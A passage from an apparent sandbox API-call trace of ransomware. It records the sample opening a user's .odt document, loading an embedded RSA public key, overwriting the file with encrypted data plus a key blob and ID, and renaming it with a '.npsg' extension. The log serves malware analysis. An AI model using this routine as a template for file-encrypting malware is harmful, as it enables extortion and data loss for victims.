cAlternateFileName="EEIWXF~1.ODT")) returned 1 [0236.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.139] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EEIWxf1e4oDyL6.odt") returned=".odt" [0236.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EEIWxf1e4oDyL6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eeiwxf1e4odyl6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.139] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=61530) returned 1 [0236.139] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.142] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf034, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.142] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.144] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf05a, lpOverlapped=0x0) returned 1 [0236.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.145] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.146] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.146] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.147] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.147] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.147] GetLastError () returned 0x0 [0236.147] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.147] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.147] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.147] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.147] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf060) returned 0x3b7fcd0 [0236.148] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94f18 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffa8 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94f60 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400098 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400050 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0236.148] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ed38 [0236.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ed38 | out: hHeap=0x620000) returned 1 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400098 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400050 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400038 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.150] GetCurrentThreadId () returned 0x5b4 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x6882d0 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.150] GetCurrentThreadId () returned 0x5b4 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400098 [0236.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400050 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000b0 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400080 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000c8 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400068 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400038 [0236.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94f60 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.155] WriteFile (in: hFile=0x644, lpBuffer=0x3b7fcd0*, nNumberOfBytesToWrite=0xf055, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7fcd0*, lpNumberOfBytesWritten=0x39afb14*=0xf055, lpOverlapped=0x0) returned 1 [0236.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.155] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf05a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.155] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0236.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0236.156] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.156] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.156] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.156] CloseHandle (hObject=0x644) returned 1 [0236.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.158] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EEIWxf1e4oDyL6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eeiwxf1e4odyl6.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EEIWxf1e4oDyL6.odt.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eeiwxf1e4odyl6.odt.npsg")) returned 1 [0236.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.160] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.161] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | 